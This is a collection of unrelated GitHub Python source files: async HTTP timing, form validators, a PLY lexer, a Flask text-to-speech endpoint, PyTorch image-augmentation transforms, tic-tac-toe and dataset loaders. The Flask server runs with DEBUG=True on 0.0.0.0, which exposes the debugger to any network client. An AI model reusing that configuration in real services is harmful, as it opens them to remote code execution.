)\n for i, future in enumerate(asyncio.as_completed(futures)):\n result = await future\n # log.info(f'{i}, {result.url}, {result.read().decode(\"utf-8\").count(\"<\")}')\n log.info(f'###Async execution took {time.time()-start:.2f}')\n\nsync()\nsync_threading()\n\nioloop = asyncio.get_event_loop()\nioloop.run_until_complete(main())\nioloop.close()\n\n# Gives output like\n# 2018-07-20 10:33:54,303 - perfomance_test - INFO - ###Sync execution took 9.75\n# 2018-07-20 10:33:56,267 - perfomance_test - INFO - ###Sync execution with threading took 1.96\n# 2018-07-20 10:33:56,291 - asyncio - DEBUG - Using selector: KqueueSelector\n# 2018-07-20 10:33:57,695 - perfomance_test - INFO - ###Async execution took 1.40\n","repo_name":"AlexShein/just_code","sub_path":"asyncio_test.py","file_name":"asyncio_test.py","file_ext":"py","file_size_in_byte":2171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"33332964041","text":"\n\nclass ValidationError(ValueError):\n def __init__(self, message=\"\", *args, **kwargs):\n ValueError.__init__(self, message, *args, **kwargs)\n\n\nclass StopValidation(Exception):\n\n def __init__(self, message=\"\", *args, **kwargs):\n Exception.__init__(self, message, *args, **kwargs)\n\n\nclass EqualTo:\n def __init__(self, field_name, message=None):\n self.field_name = field_name\n self.message = message\n\n def __call__(self, form, field):\n try:\n other = form[self.field_name]\n except KeyError as exc:\n raise ValidationError(\n field.gettext(\"Invalid field name '%s'\" % self.field_name)\n ) from exc\n\n if field.data == other.data:\n return\n d = {\n \"other_label\": hasattr(other, \"label\") and other.label.text or self.field_name,\n \"other_name\": self.field_name\n }\n message = self.message\n if message is None:\n message = field.gettext(\"Field must be equal to %(other_name)s.\")\n raise ValidationError(message % d)\n\n\nclass Length:\n\n def __init__(self, min=-1, max=-1, message=None):\n assert (\n min != -1 or max != -1\n ), \"At least one of `min` or `max` must be specified\"\n assert max == -1 or min <= max, \"`min` cannot be more than `max`.\"\n\n self.min = min\n self.max = max\n self.message = message\n self.field_flags = {}\n if self.min != -1:\n self.field_flags[\"minlength\"] = self.min\n if self.max != -1:\n self.field_flags[\"maxlength\"] = self.max\n\n def __call__(self, form, field):\n length = field.data and len(field.data) or 0\n if length >= self.min and (self.max == -1 or length <= self.max):\n return\n\n if self.message is not None:\n message = self.message\n elif self.max == -1:\n message = field.ngettext(\n \"Field must be at least %(min)d character long.\",\n \"Field must be at least %(min)d characters long.\",\n self.min\n )\n elif self.min == -1:\n message = field.ngettext(\n \"Field cannot be longer than %(max)d character.\",\n \"Field cannot be longer than %(max)d characters.\",\n self.max,\n )\n elif self.min == self.max:\n message = field.ngettext(\n \"Field must be exactly %(max)d character long.\",\n \"Field must be exactly %(max)d characters long.\",\n self.max,\n )\n else:\n message = field.gettext(\n \"Field must be between %(min)d and %(max)d characters long.\"\n )\n\n raise ValidationError(message % dict(min=self.min, max=self.max, 
length=length))\n\n\n","repo_name":"Xerxes-cn/boring","sub_path":"boring_copy/wtforms/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":2829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43470966101","text":"import json\nfrom decimal import Decimal\nimport datetime as dt\nfrom tlx.util import string_from_datetime\n\n\ndef json_loads(x, **kwargs):\n \"\"\"Loads json for DynamoDB (Numerical types go to Decimal)\"\"\"\n return json.loads(x, parse_int=Decimal, parse_float=Decimal, **kwargs)\n\n\ndef json_dumps(x, **kwargs):\n \"\"\"Dumps json for DynamoDB (Numerical types go to Decimal) use indent=4 if required\"\"\"\n return json.dumps(x, cls=DynamoEncoder, separators=(',', ': '), **kwargs)\n\n\nclass DynamoEncoder(json.JSONEncoder):\n \"\"\" Makes type conversions to allow JSON serialisation using data types commonly used in the project\n Decimal -> float\n datetime -> ISO string\n \"\"\"\n\n def default(self, o, markers=None):\n if isinstance(o, Decimal):\n return float(o)\n if isinstance(o, dt.datetime):\n return string_from_datetime(o)\n return json.JSONEncoder(self).default(o, markers)\n","repo_name":"tlelson/tlx","sub_path":"tlx/dynamodb/json.py","file_name":"json.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30874118520","text":"import ply.lex as lex\r\nimport re\r\nimport tablaSimbolos\r\n\r\n#Palabras reservadas\r\nreservadas = ['INT','BOOLEAN','STRING','IF','DEFAULT','BREAK','RETURN','FUNCTION','SWITCH','CASE','PRINT','LET','INPUT']\r\n\r\n#Tokens\r\ntokens = reservadas + ['ID','ENT','CAD','SUM','LLAVEL','LLAVER','PARL','PARR','PUNTS','FIN','COM','NOT','ASIGSUM','ASIG','COMMENT','PR','EQU','NOTEQU']\r\n\r\n#Token - String:\r\nmapTokToStr = {\r\n'(\\'ENT\\', None)' : 'entero',\r\n'(\\'CAD\\', None)' : 'cadena',\r\n'(\\'BOOLEAN\\', None)' : 'boolean',\r\n'(\\'SUM\\', None)' : '+',\r\n'(\\'LLAVEL\\', None)' : '{',\r\n'(\\'LLAVER\\', None)' : '}',\r\n'(\\'PARL\\', None)' : '(',\r\n'(\\'PARR\\', None)' : ')',\r\n'(\\'FIN\\', None)' : ';',\r\n'(\\'COM\\', None)' : ',',\r\n'(\\'NOT\\', None)' : '!',\r\n'(\\'ASIGSUM\\', None)' : '+=',\r\n'(\\'ASIG\\', None)' : '=',\r\n'(\\'EQU\\', None)' : '==',\r\n'(\\'NOTEQU\\', None)' : '!=',\r\n'(\\'PUNTS\\', None)' : ':',\r\n'(\\'PR\\', 1)' : 'int',\r\n'(\\'PR\\', 2)' : 'boolean',\r\n'(\\'PR\\', 3)' : 'string',\r\n'(\\'PR\\', 4)' : 'if',\r\n'(\\'PR\\', 5)' : 'default',\r\n'(\\'PR\\', 6)' : 'break',\r\n'(\\'PR\\', 7)' : 'return',\r\n'(\\'PR\\', 8)' : 'function',\r\n'(\\'PR\\', 9)' : 'switch',\r\n'(\\'PR\\', 10)' : 'case',\r\n'(\\'PR\\', 11)' : 'print',\r\n'(\\'PR\\', 12)' : 'input',\r\n'(\\'PR\\', 13)' : 'let', \r\n'(\\'ID\\', None)' : 'id',\r\n'(\\'EOF\\', None)' : 'Fin de fichero'\r\n}\r\n\r\ndef tokToStr(tok):\r\n\tif tok[0] in [\"CAD\", \"ID\", \"BOOLEAN\", \"ENT\"]:\r\n\t\ttok=(tok[0],None)\r\n\treturn mapTokToStr[str(tok)]\r\n\r\n#Tabla de palabras reservadas\r\nvalorReservadas = {'INT': 1, 'BOOLEAN': 2, 'STRING': 3, \r\n'IF': 4, 'DEFAULT': 5, 'BREAK': 6, 'RETURN': 7, 'FUNCTION': 8,\r\n'SWITCH': 9, 'CASE': 10, 'PRINT': 11, 'INPUT': 12, 'LET': 13,\r\n'TRUE': 'true', 'FALSE':'false' }\r\n\r\n\r\ntablaDeSimbolos = None\r\n\r\n#Expresiones Regulares\r\n\r\ndef t_COMMENT(t):\r\n\tr'(/\\*(.|\\n)*?\\*/)|(//.*)'\r\n\tncr = t.value.count(\"\\n\")\r\n\tt.lexer.lineno += ncr\r\n\r\n\r\ndef t_newline(t):\r\n\tr'\\n+'\r\n\tt.lexer.lineno += 
len(t.value)\r\n\r\ndef t_ASIGSUM(t):\r\n\tr'\\+='\r\n\tt.value=None\r\n\treturn t\r\n\r\ndef t_EQU(t):\r\n\tr'=='\r\n\tt.value=None\r\n\treturn t\r\n\r\ndef t_SUM(t):\r\n\tr'\\+'\r\n\tt.value=None\r\n\treturn t\r\n\r\nt_ignore = '\\t '\r\n\r\ndef t_LLAVEL(t):\r\n\tr'{'\r\n\tt.value=None\r\n\treturn t\r\n\r\ndef t_LLAVER(t):\r\n\tr'}'\r\n\tt.value=None\r\n\treturn t\r\n\r\ndef t_PARL(t):\r\n\tr'\\('\r\n\tt.value=None\r\n\treturn t\r\n\r\ndef t_PARR(t):\r\n\tr'\\)'\r\n\tt.value=None\r\n\treturn t\r\n\r\ndef t_FIN(t):\r\n\tr';'\r\n\tt.value=None\r\n\treturn t\r\n\r\ndef t_COM(t):\r\n\tr','\r\n\tt.value=None\r\n\treturn t\r\n\r\ndef t_PUNTS(t):\r\n\tr':'\r\n\tt.value=None\r\n\treturn t\r\n\r\ndef t_NOTEQU(t):\r\n\tr'!='\r\n\tt.value=None\r\n\treturn t\r\n\r\ndef t_NOT(t):\r\n\tr'!'\r\n\tt.value=None\r\n\treturn t\r\n\r\ndef t_ASIG(t):\r\n\tr'='\r\n\tt.value=None\r\n\treturn t\r\n\r\n#Funciones\r\ndef t_ID(t):\r\n\tr'[a-zA-Z]+[a-zA-Z_0-9]*'\r\n\tlexema = t.value\r\n\tt.value=valorReservadas.get(t.value.upper(), 0)\r\n\t#print('Entrando en tID')\r\n\t#print(t.value)\r\n\t#Vemos si es cte booleana o PR\r\n\tif(t.value!=0):\r\n\t\tif t.value=='true':\r\n\t\t\tt.type='BOOLEAN'\r\n\t\t\tt.value=1\r\n\t\telif t.value=='false':\r\n\t\t\tt.type='BOOLEAN'\r\n\t\t\tt.value=0\r\n\t\telse:\r\n\t\t\tt.type='PR'\r\n\telse:\r\n\t\tt.value=tablaDeSimbolos.insertaNuevoID(lexema)\r\n\treturn t\r\n\r\ndef t_ENT(t):\r\n\tr'\\d+'\r\n\tt.type='ENT'\r\n\tif int(t.value) > 32767:\r\n\t\traise Exception('ERROR Lexito en linea '+ str(t.lexer.lineno) +': Entero supera el tamaño máximo')\r\n\tt.value=int(t.value)\r\n\treturn t\r\n\r\ndef t_CAD(t):\r\n\tr'(\\\"([^\\\\\\n]|(\\\\(.|\\n)))*?\\\")'\r\n\tif int(len(t.value)) > 64:\r\n\t\traise Exception('ERROR Lexito en linea '+ str(t.lexer.lineno) +': Cadena supera el tamaño máximo')\r\n\tt.value = '\\\"' +t.value[1:-1] +'\\\"'\r\n\treturn t\r\n\r\ndef t_error(t):\r\n\tprint(\"Illegal character '%s'\" % t.value[0])\r\n\tt.lexer.skip(1)\r\n\r\nclass AnalizadorLex:\r\n\t#Constructor\r\n\tdef __init__(self, ts=None):\r\n\t\tself.lexer = lex.lex()\r\n\t\tself.ftokens = open(\"tokens.txt\",\"w+\")\r\n\t\tglobal tablaDeSimbolos\r\n\t\ttablaDeSimbolos = ts\r\n\r\n\tdef anyadirToken(self, tok):\r\n\t\tself.ftokens.write('<' + tok.type + ','+ NoneOrString(tok.value) + '>\\n')\r\n\r\n#Funcion auxiliar que imprime vacio si es None o directamente el\r\n#string argumento s en caso contrario\r\ndef NoneOrString(s):\r\n\tif s is None:\r\n\t\treturn ''\r\n\treturn str(s)\r\n\r\n#Funcion Main\r\ndef main():\r\n\tanalizador = lex.lex()\r\n\tglobal tablaDeSimbolos\r\n\ttablaDeSimbolos = tablaSimbolos.TablaSimbolos()\r\n\r\n\tnFichero = input(\"Inserta nombre de fichero:\")\r\n\thandle = open(nFichero)\r\n\tcadena = handle.read()\r\n\tprint(cadena)\r\n\tanalizador.input(cadena)\r\n\tftokens = open(\"tokens.txt\",\"w+\")\r\n\r\n\ttok = analizador.token()\r\n\twhile tok is not None:\r\n\t\t#print(f'hola,{tok}')\r\n\t\tif not tok :\r\n\t\t\tprint(\"Token erroneo:\",tok)\r\n\t\t\tbreak\r\n\t\tprint('<' + tok.type + ','+ NoneOrString(tok.value) + ',linea:'+str(analizador.lineno)+'>')\r\n\t\tftokens.write('<' + tok.type + ','+ NoneOrString(tok.value) + '>\\n')\r\n\t\ttry:\r\n\t\t\ttok = analizador.token()\r\n\t\texcept Exception as error:\r\n\t\t\tprint(repr(error))\r\n\t\t\tftokens.close()\r\n\t\t\treturn\r\n\tftokens.close()\r\n\r\nif __name__ == 
'__main__':\r\n\tmain()\r\n","repo_name":"frankiemarley/PDL","sub_path":"lexico.py","file_name":"lexico.py","file_ext":"py","file_size_in_byte":4787,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42874022908","text":"import flask\nfrom flask import request, jsonify\nfrom flask_api import status\n\nfrom EN.loadEN import TTSLib as TTSEN\nfrom DE.loadDE import TTSLib as TTSDE\n\napp = flask.Flask(__name__)\napp.config[\"DEBUG\"] = True\n\n# different instances for different languages\nttsEN = TTSEN()\nttsDE = TTSDE()\n\n\ndef readBytesOfFile(pathToFile):\n fileStreamRead = open(pathToFile, \"rb\")\n data = fileStreamRead.read()\n fileStreamRead.close()\n return data\n\n\ndef checkIfArgumentsAreValid(language):\n listOfStrings = ['de', 'deutsch', 'en', 'english']\n if language in listOfStrings:\n return True\n\n return False\n\n\ndef createAudioFile(receivedText, language):\n if \"en\" in language:\n ttsEN.generateAudio(receivedText)\n\n if \"de\" in language:\n ttsDE.generateAudio(receivedText)\n\n\ndef getByteList(data):\n byteList = []\n\n for byte in data:\n byteList.append(byte)\n\n return byteList\n\n\n@app.route('/audio', methods=['GET'])\ndef getAudioFromFile():\n\n receivedText = request.args.get(\"text\")\n language = request.args.get(\"language\")\n\n # https://www.flaskapi.org/api-guide/status-codes/\n if not checkIfArgumentsAreValid(language):\n content = {'Message': \"Invalid language selection!\"}\n return content, status.HTTP_400_BAD_REQUEST\n\n print(\"[GET-Request]: Data received: \", receivedText)\n createAudioFile(receivedText, language)\n byteList = getByteList(readBytesOfFile(\"./Audio/serverAudio.wav\"))\n\n return jsonify({'data': byteList})\n\n\napp.run(host='0.0.0.0')\n","repo_name":"SRFG-MAT/RoboGen-DeepSpeechServices","sub_path":"Server_Client/Scripts/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73970372324","text":"import numbers\nimport math\nimport torch\nimport torchvision.transforms.functional as F\n\n\nclass GroupRandomResizedCrop(torch.nn.Module):\n def __init__(self, size, scale=(0.08, 1.0), ratio=(3. / 4., 4. 
/ 3.)):\n super().__init__()\n self.size = size\n self.scale = scale\n self.ratio = ratio\n\n @staticmethod\n def get_params(img, scale, ratio):\n _, height, width = img.size()\n area = height * width\n\n log_ratio = torch.log(torch.tensor(ratio))\n for _ in range(10):\n target_area = area * torch.empty(1).uniform_(scale[0], scale[1]).item()\n aspect_ratio = torch.exp(\n torch.empty(1).uniform_(log_ratio[0], log_ratio[1])\n ).item()\n\n w = int(round(math.sqrt(target_area * aspect_ratio)))\n h = int(round(math.sqrt(target_area / aspect_ratio)))\n\n if 0 < w <= width and 0 < h <= height:\n i = torch.randint(0, height - h + 1, size=(1,)).item()\n j = torch.randint(0, width - w + 1, size=(1,)).item()\n return i, j, h, w\n\n # Fallback to central crop\n in_ratio = float(width) / float(height)\n if in_ratio < min(ratio):\n w = width\n h = int(round(w / min(ratio)))\n elif in_ratio > max(ratio):\n h = height\n w = int(round(h * max(ratio)))\n else: # whole image\n w = width\n h = height\n i = (height - h) // 2\n j = (width - w) // 2\n return i, j, h, w\n\n def forward(self, images):\n \"\"\"\n Args:\n img (PIL Image or Tensor): Image to be cropped and resized.\n\n Returns:\n PIL Image or Tensor: Randomly cropped and resized image.\n \"\"\"\n i, j, h, w = self.get_params(images[0], self.scale, self.ratio)\n return [F.resized_crop(img, i, j, h, w, self.size) for img in images]\n\n\nclass GroupRandomRotation(torch.nn.Module):\n def __init__(\n self, degrees, expand=False, center=None, fill=0, resample=None\n ):\n super().__init__()\n\n self.degrees = _setup_angle(degrees, name=\"degrees\", req_sizes=(2,))\n\n self.center = center\n\n self.resample = resample\n self.expand = expand\n\n self.fill = fill\n\n @staticmethod\n def get_params(degrees) -> float:\n \"\"\"Get parameters for ``rotate`` for a random rotation.\n\n Returns:\n float: angle parameter to be passed to ``rotate`` for random rotation.\n \"\"\"\n angle = float(torch.empty(1).uniform_(float(degrees[0]), float(degrees[1])).item())\n return angle\n\n def forward(self, images):\n \"\"\"\n Args:\n img (PIL Image or Tensor): Image to be rotated.\n\n Returns:\n PIL Image or Tensor: Rotated image.\n \"\"\"\n fill = self.fill\n angle = self.get_params(self.degrees)\n\n return [F.rotate(img, angle=angle, resample=self.resample, expand=self.expand, center=self.center, fill=fill) for img in images]\n\n\nclass GroupRandomHorizontalFlip(torch.nn.Module):\n def __init__(self, p=0.5):\n super().__init__()\n self.p = p\n\n def forward(self, images):\n \"\"\"\n Args:\n img (PIL Image or Tensor): Image to be flipped.\n\n Returns:\n PIL Image or Tensor: Randomly flipped image.\n \"\"\"\n if torch.rand(1) < self.p:\n return [F.hflip(img) for img in images]\n return images\n\n\nclass GroupRandomVerticalFlip(torch.nn.Module):\n def __init__(self, p=0.5):\n super().__init__()\n self.p = p\n\n def forward(self, images):\n \"\"\"\n Args:\n img (PIL Image or Tensor): Image to be flipped.\n\n Returns:\n PIL Image or Tensor: Randomly flipped image.\n \"\"\"\n if torch.rand(1) < self.p:\n return [F.vflip(img) for img in images]\n return images\n\n\nclass GroupColorJitter(torch.nn.Module):\n def __init__(self, brightness=0, contrast=0, saturation=0, hue=0):\n super().__init__()\n self.brightness = self._check_input(brightness, 'brightness')\n self.contrast = self._check_input(contrast, 'contrast')\n self.saturation = self._check_input(saturation, 'saturation')\n self.hue = self._check_input(hue, 'hue', center=0, bound=(-0.5, 0.5),\n clip_first_on_zero=False)\n\n 
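# validation helper mirroring torchvision ColorJitter's argument handling\n 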
@torch.jit.unused\n def _check_input(self, value, name, center=1, bound=(0, float('inf')), clip_first_on_zero=True):\n if isinstance(value, numbers.Number):\n if value < 0:\n raise ValueError(\"If {} is a single number, it must be non negative.\".format(name))\n value = [center - float(value), center + float(value)]\n if clip_first_on_zero:\n value[0] = max(value[0], 0.0)\n elif isinstance(value, (tuple, list)) and len(value) == 2:\n if not bound[0] <= value[0] <= value[1] <= bound[1]:\n raise ValueError(\"{} values should be between {}\".format(name, bound))\n else:\n raise TypeError(\"{} should be a single number or a list/tuple with length 2.\".format(name))\n\n # if value is 0 or (1., 1.) for brightness/contrast/saturation\n # or (0., 0.) for hue, do nothing\n if value[0] == value[1] == center:\n value = None\n return value\n\n @staticmethod\n def get_params(brightness, contrast, saturation, hue):\n fn_idx = torch.randperm(4)\n\n b = None if brightness is None else float(torch.empty(1).uniform_(brightness[0], brightness[1]))\n c = None if contrast is None else float(torch.empty(1).uniform_(contrast[0], contrast[1]))\n s = None if saturation is None else float(torch.empty(1).uniform_(saturation[0], saturation[1]))\n h = None if hue is None else float(torch.empty(1).uniform_(hue[0], hue[1]))\n\n return fn_idx, b, c, s, h\n\n def forward(self, images):\n \"\"\"\n Args:\n img (PIL Image or Tensor): Input image.\n\n Returns:\n PIL Image or Tensor: Color jittered image.\n \"\"\"\n fn_idx, brightness_factor, contrast_factor, saturation_factor, hue_factor = \\\n self.get_params(self.brightness, self.contrast, self.saturation, self.hue)\n\n for fn_id in fn_idx:\n if fn_id == 0 and brightness_factor is not None:\n images = [F.adjust_brightness(img, brightness_factor) for img in images]\n elif fn_id == 1 and contrast_factor is not None:\n images = [F.adjust_contrast(img, contrast_factor) for img in images]\n elif fn_id == 2 and saturation_factor is not None:\n images = [F.adjust_saturation(img, saturation_factor) for img in images]\n elif fn_id == 3 and hue_factor is not None:\n images = [F.adjust_hue(img, hue_factor) for img in images]\n\n return images\n\n\nclass GroupGaussianBlur(torch.nn.Module):\n def __init__(self, kernel_size, sigma=(0.1, 2.0)):\n super().__init__()\n self.kernel_size = kernel_size\n self.sigma = sigma\n\n @staticmethod\n def get_params(sigma_min, sigma_max):\n return torch.empty(1).uniform_(sigma_min, sigma_max).item()\n\n def forward(self, images):\n \"\"\"\n Args:\n img (PIL Image or Tensor): image to be blurred.\n\n Returns:\n PIL Image or Tensor: Gaussian blurred image\n \"\"\"\n sigma = self.get_params(self.sigma[0], self.sigma[1])\n return [F.gaussian_blur(img, self.kernel_size, [sigma, sigma]) for img in images]\n\n\nclass GroupToTensor(torch.nn.Module):\n def __call__(self, images):\n \"\"\"\n Args:\n pic (PIL Image or numpy.ndarray): Image to be converted to tensor.\n\n Returns:\n Tensor: Converted image.\n \"\"\"\n return [F.to_tensor(img) for img in images]\n\n\nclass GroupNormalize(torch.nn.Module):\n def __init__(self, mean, std, inplace=False):\n super().__init__()\n self.mean = mean\n self.std = std\n self.inplace = inplace\n\n def forward(self, tensors):\n \"\"\"\n Args:\n tensor (Tensor): Tensor image to be normalized.\n\n Returns:\n Tensor: Normalized Tensor image.\n \"\"\"\n return torch.stack([F.normalize(tensor, self.mean, self.std, self.inplace) for tensor in tensors])\n\n\nclass GroupRandomErasing(torch.nn.Module):\n def __init__(self, p=0.5, 
scale=(0.02, 0.33), ratio=(0.3, 3.3), value=0, inplace=False):\n super().__init__()\n self.p = p\n self.scale = scale\n self.ratio = ratio\n self.value = value\n self.inplace = inplace\n\n @staticmethod\n def get_params(img, scale, ratio, value=None):\n img_c, img_h, img_w = img.size()\n area = img_h * img_w\n\n log_ratio = torch.log(torch.tensor(ratio))\n for _ in range(10):\n erase_area = area * torch.empty(1).uniform_(scale[0], scale[1]).item()\n aspect_ratio = torch.exp(\n torch.empty(1).uniform_(log_ratio[0], log_ratio[1])\n ).item()\n\n h = int(round(math.sqrt(erase_area * aspect_ratio)))\n w = int(round(math.sqrt(erase_area / aspect_ratio)))\n if not (h < img_h and w < img_w):\n continue\n\n if value is None:\n v = torch.empty([img_c, h, w], dtype=torch.float32).normal_()\n else:\n v = torch.tensor(value)[:, None, None]\n\n i = torch.randint(0, img_h - h + 1, size=(1,)).item()\n j = torch.randint(0, img_w - w + 1, size=(1,)).item()\n return i, j, h, w, v\n\n # Return original image\n return 0, 0, img_h, img_w, img\n\n def forward(self, images):\n \"\"\"\n Args:\n img (Tensor): Tensor image to be erased.\n\n Returns:\n img (Tensor): Erased Tensor image.\n \"\"\"\n if torch.rand(1) < self.p:\n\n # cast self.value to script acceptable type\n if isinstance(self.value, (int, float)):\n value = [self.value, ]\n elif isinstance(self.value, str):\n value = None\n elif isinstance(self.value, tuple):\n value = list(self.value)\n else:\n value = self.value\n\n x, y, h, w, v = self.get_params(images[0], scale=self.scale, ratio=self.ratio, value=value)\n if x == 0 and y == 0:\n return images\n else:\n return [F.erase(img, x, y, h, w, v, self.inplace) for img in images]\n return images\n\n\nclass GroupCenterCrop(torch.nn.Module):\n def __init__(self, size):\n super().__init__()\n self.size = size\n\n def forward(self, images):\n \"\"\"\n Args:\n img (PIL Image or Tensor): Image to be cropped.\n\n Returns:\n PIL Image or Tensor: Cropped image.\n \"\"\"\n return [F.center_crop(img, self.size) for img in images]\n\n\nclass GroupResize(torch.nn.Module):\n def __init__(self, size):\n super().__init__()\n self.size = size\n\n def forward(self, images):\n \"\"\"\n Args:\n img (PIL Image or Tensor): Image to be scaled.\n\n Returns:\n PIL Image or Tensor: Rescaled image.\n \"\"\"\n return [F.resize(img, self.size) for img in images]\n\n\nclass GroupConvertImageDtype(torch.nn.Module):\n def __init__(self, dtype):\n super().__init__()\n self.dtype = dtype\n\n def __call__(self, images):\n \"\"\"\n Args:\n pic (PIL Image or numpy.ndarray): Image to be converted to tensor.\n\n Returns:\n Tensor: Converted image.\n \"\"\"\n return [F.convert_image_dtype(img, self.dtype) for img in images]\n\n\ndef _setup_angle(x, name, req_sizes=(2,)):\n if isinstance(x, numbers.Number):\n if x < 0:\n raise ValueError(\"If {} is a single number, it must be positive.\".format(name))\n x = [-x, x]\n\n return [float(d) for d in x]\n","repo_name":"trigger26/SPSVR","sub_path":"transforms.py","file_name":"transforms.py","file_ext":"py","file_size_in_byte":12058,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"9613587849","text":"#!/usr/bin/env pypy3\n# -*- coding: UTF-8 -*-\ndef prime_t(t):\n i=2\n while i**2<=t:\n if t%i==0:\n return 0\n i+=1\n return 1\np=[]\n\nfor i in range(2,1008):\n if prime_t(i):\n p.append(i)\nd={i:0 for i in p}\nmod=10**9+7\nn=int(input())\ntmp=1\nans=1\nR=[i for i in range(168)]\nfor i in range(1,n+1):\n tmp*=i\n for j in R:\n while 
tmp%p[j]==0:\n            d[p[j]]+=1\n            tmp//=p[j]\n        if tmp= self.boarddims[0] * self.boarddims[1]) :\n                print('Invalid spot, choose another')\n                continue\n            spot = self.spotToXY(spot)\n            if (self.board[spot[0], spot[1]] > 0):\n                print('Spot taken, choose another')\n                continue\n            valid = True\n        return spot\n    \n    def showBoard(self) :\n        index = 0\n        for row in range(self.boarddims[0]) :\n            for col in range(self.boarddims[1]) :\n                position_entry = index if self.board[row,col] == 0 else ('X' if self.board[row,col] == 1 else 'Y') \n                print(' {} '.format(position_entry), end='')\n                index = index + 1\n            print('\\n')\n    \n    def checkWinner(self) :\n        winner = 0\n        \n        # check cols\n        for i in range(self.boarddims[0]) :\n            if np.all(self.board[:,i] == 1) :\n                return 1\n            if np.all(self.board[:,i] == 2) :\n                return 2\n        # check rows\n        for i in range(self.boarddims[1]) :\n            if np.all(self.board[i,:] == 1) :\n                return 1\n            if np.all(self.board[i,:] == 2) :\n                return 2\n        # check diags\n        if np.all(self.board.diagonal() == 1) :\n            return 1\n        if np.all(self.board.diagonal() == 2) :\n            return 2\n        \n        reverse_diag = np.array([self.board[i,self.boarddims[1]-1-i] for i in range(self.boarddims[0])]) \n        if np.all(reverse_diag == 1) :\n            return 1\n        if np.all(reverse_diag == 2) :\n            return 2\n        \n        maxed_out = not (self.board==0).any()\n        if (maxed_out and winner == 0) :\n            winner = -1\n        \n        return winner\n\n'''\n  0  1  2 \n\n  3  4  5 \n\n  6  7  8 \n'''\n    \n#%% Test game\nplaying = True\nwhile playing == True :\n    game = tictactoe(2, 3)\n    game.play()\n    \n    valid = False\n    while valid == False :\n        try : \n            playing = bool(int(input('Play again? (0 for no, any other # for yes) ')))\n            if playing == False :\n                print('Goodbye!')\n                break\n        except : \n            valid = False\n        valid = True\n","repo_name":"starstorms9/Insight-CS-Practicals","sub_path":"tictac/Tyler_Habowski_TicTacToe_V1.py","file_name":"Tyler_Habowski_TicTacToe_V1.py","file_ext":"py","file_size_in_byte":3484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28188777506","text":"\"\"\"\nUtilities for data.\n\"\"\"\n\nimport numpy as np\nimport torch\nimport torchvision\nfrom torch.utils.data import TensorDataset, DataLoader\nfrom torchvision import transforms, datasets\n\nfrom utils import toy_data\nfrom .toy_data import TOY_DSETS\nfrom tabular import TAB_DSETS\n\n\ndef logit(x, alpha=0.):\n    x = x * (1. - 2 * alpha) + alpha\n    return torch.log(x) - torch.log(1. 
- x)\n\n\ndef get_data(args):\n \"\"\"\n Get data.\n \"\"\"\n if args.unit_interval:\n post_trans = [lambda x: x]\n post_trans_inv = lambda x: x\n elif args.logit:\n post_trans = [lambda x: (x + (torch.rand_like(x) - 0.5) / 256).clamp(1e-3, 1-1e-3), logit]\n post_trans_inv = lambda x: x.sigmoid()\n else:\n post_trans = [lambda x: 2 * x - 1]\n post_trans_inv = lambda x: (x + 1) / 2\n if args.dataset in TOY_DSETS:\n data = torch.from_numpy(toy_data.inf_train_gen(args.dataset, batch_size=args.batch_size)).float()\n dset = TensorDataset(data, data) # add data as \"labels\" to match api for image dsets\n dload = DataLoader(dset, args.batch_size, True, drop_last=True)\n\n sqrt = lambda x: int(torch.sqrt(torch.Tensor([x])))\n plot = lambda p, x: torchvision.utils.save_image(x, p, normalize=False, nrow=sqrt(x.size(0)))\n return dload, dload, plot\n elif args.dataset in TAB_DSETS:\n dset = TAB_DSETS[args.dataset](seed=args.seed)\n\n tr_dataset = TensorDataset(torch.tensor(dset.trn.x), torch.tensor(dset.trn.y))\n te_dataset = TensorDataset(torch.tensor(dset.val.x), torch.tensor(dset.val.y))\n\n tr_dload = DataLoader(tr_dataset, args.batch_size, True, drop_last=True)\n te_dload = DataLoader(te_dataset, args.batch_size, False)\n\n return tr_dload, te_dload, None\n elif args.dataset == \"mnist\":\n if args.img_size is not None:\n pre_trans = [transforms.Resize(args.img_size),\n transforms.ToTensor()]\n else:\n pre_trans = [transforms.ToTensor()]\n post_trans += [lambda x: x.view(-1)]\n\n tr_dataset = datasets.MNIST(\"./data\",\n transform=transforms.Compose(pre_trans +\n post_trans),\n download=True)\n te_dataset = datasets.MNIST(\"./data\", train=False,\n transform=transforms.Compose(pre_trans + post_trans),\n download=True)\n\n\n tr_dload = DataLoader(tr_dataset, args.batch_size, True, drop_last=True)\n te_dload = DataLoader(te_dataset, args.batch_size, False)\n\n sqrt = lambda x: int(torch.sqrt(torch.Tensor([x])))\n plot = lambda p, x: \\\n torchvision.utils.save_image(post_trans_inv(x), p, normalize=False, nrow=sqrt(x.size(0)))\n\n return tr_dload, te_dload, plot\n elif args.dataset == \"stackmnist\":\n if args.img_size is not None:\n pre_trans = [transforms.Resize(args.img_size), transforms.ToTensor()]\n else:\n pre_trans = [transforms.ToTensor()]\n post_trans += [lambda x: x.view(-1)]\n tr_dataset = datasets.MNIST(\"./data\",\n transform=transforms.Compose(pre_trans +\n post_trans),\n download=True)\n\n def dataset_to_tensor(dataset):\n \"\"\"\n Convert dataset to tensor (in particular apply resizing transformations).\n \"\"\"\n loader = DataLoader(dataset, batch_size=len(dataset))\n return next(iter(loader))\n\n def stack_mnist(dataset):\n \"\"\"\n Stack 3 MNIST images along 3 channels.\n \"\"\"\n x, y = dataset_to_tensor(dataset)\n np.random.seed(args.seed) # seed so we always train on the same stackmnist\n ids = np.random.randint(0, x.shape[0], size=(x.shape[0], 3))\n X_training = torch.zeros(x.shape[0], 3, x.shape[2], x.shape[3])\n Y_training = torch.zeros(x.shape[0])\n for i in range(ids.shape[0]):\n cnt = 0\n for j in range(ids.shape[1]):\n xij = x[ids[i, j]]\n X_training[i, j] = 